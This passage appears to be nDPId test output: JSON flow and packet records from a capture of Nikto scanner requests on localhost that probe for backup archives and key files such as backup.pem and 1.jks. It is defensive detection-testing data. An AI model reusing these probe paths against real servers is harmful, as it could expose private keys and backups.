(Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1576420276933,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276933,"pkt":"AAAAAAAAAAAAAAAACABFAADFT2BAAEAG7NB\/AAABfwAAAcLaH5CU9HcQhzdjIYAYAED+uQAAAQEICp1m++2dZvvtR0VUIC9zaXRlLnRhci5sem1hIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276933,"flow_last_seen":1576420276933,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276933,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49882,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276934,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1576420276934,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276934,"pkt":"AAAAAAAAAAAAAAAACABFAADFqdVAAEAGklt\/AAABfwAAAcLcH5A055GDxax\/gIAYAED+uQAAAQEICp1m++6dZvvuR0VUIC9zaXRlLnRhci5sem1hIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":170,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276934,"flow_last_seen":1576420276934,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276934,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49884,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276936,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1576420276936,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420276936,"pkt":"AAAAAAAAAAAAAAAACABFAADKdTNAAEAGxvh\/AAABfwAAAcLeH5C4Uk1kAkvbMoAYAED+vgAAAQEICp1m+++dZvvvR0VUIC8xMjcuMC4wLjEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276936,"flow_last_seen":1576420276936,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276936,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49886,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276937,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1576420276937,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420276937,"pkt":"AAAAAAAAAAAAAAAACABFAADK9XZAAEAGRrV\/AAABfwAAAcLgH5B7eM0nuPdDlYAYAED+vgAAAQEICp1m+\/GdZvvxR0VUIC8xMjcuMC4wLjEudGFyLmx6bWEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276937,"flow_last_seen":1576420276937,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420276937,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49888,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276938,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1576420276938,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276938,"pkt":"AAAAAAAAAAAAAAAACABFAADFaYFAAEAG0q9\/AAABfwAAAcLiH5DjU1EuPo0KHoAYAED+uQAAAQEICp1m+\/KdZvvyR0VUIC8xMjcuMC4wLjEuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276938,"flow_last_seen":1576420276938,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276938,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49890,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276939,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1576420276939,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276939,"pkt":"AAAAAAAAAAAAAAAACABFAADFJ3BAAEAGFMF\/AAABfwAAAcLkH5B8NB8+Bh651YAYAED+uQAAAQEICp1m+\/OdZvvzR0VUIC8xMjcuMC4wLjEuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":174,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276939,"flow_last_seen":1576420276939,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276939,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49892,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276941,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1576420276941,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276941,"pkt":"AAAAAAAAAAAAAAAACABFAADCOKZAAEAGA45\/AAABfwAAAcLmH5ActAD4h3K22IAYAED+tgAAAQEICp1m+\/WdZvv1R0VUIC9iYWNrdXAucGVtIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":175,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276941,"flow_last_seen":1576420276941,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276941,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49894,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276943,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1576420276943,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276943,"pkt":"AAAAAAAAAAAAAAAACABFAADCuRhAAEAGgxt\/AAABfwAAAcLoH5DBbYFGICWC9IAYAED+tgAAAQEICp1m+\/edZvv3R0VUIC9iYWNrdXAucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276943,"flow_last_seen":1576420276943,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276943,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49896,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276945,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1576420276945,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276945,"pkt":"AAAAAAAAAAAAAAAACABFAAC9GW5AAEAGIst\/AAABfwAAAcLqH5C0ISE5HkW76YAYAED+sQAAAQEICp1m+\/mdZvv5R0VUIC8xLmprcyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":177,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276945,"flow_last_seen":1576420276945,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276945,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49898,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276947,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1576420276947,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276947,"pkt":"AAAAAAAAAAAAAAAACABFAAC9hilAAEAGtg9\/AAABfwAAAcLsH5DmS75z\/EZQIIAYAED+sQAAAQEICp1m+\/udZvv7R0VUIC8xLmprcyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276947,"flow_last_seen":1576420276947,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276947,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49900,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276949,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1576420276949,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276949,"pkt":"AAAAAAAAAAAAAAAACABFAADG8sFAAEAGSW5\/AAABfwAAAcLuH5DZeMrrTWBmVIAYAED+ugAAAQEICp1m+\/2dZvv9R0VUIC8xMjcwMC50YXIubHptYSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276949,"flow_last_seen":1576420276949,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276949,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49902,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 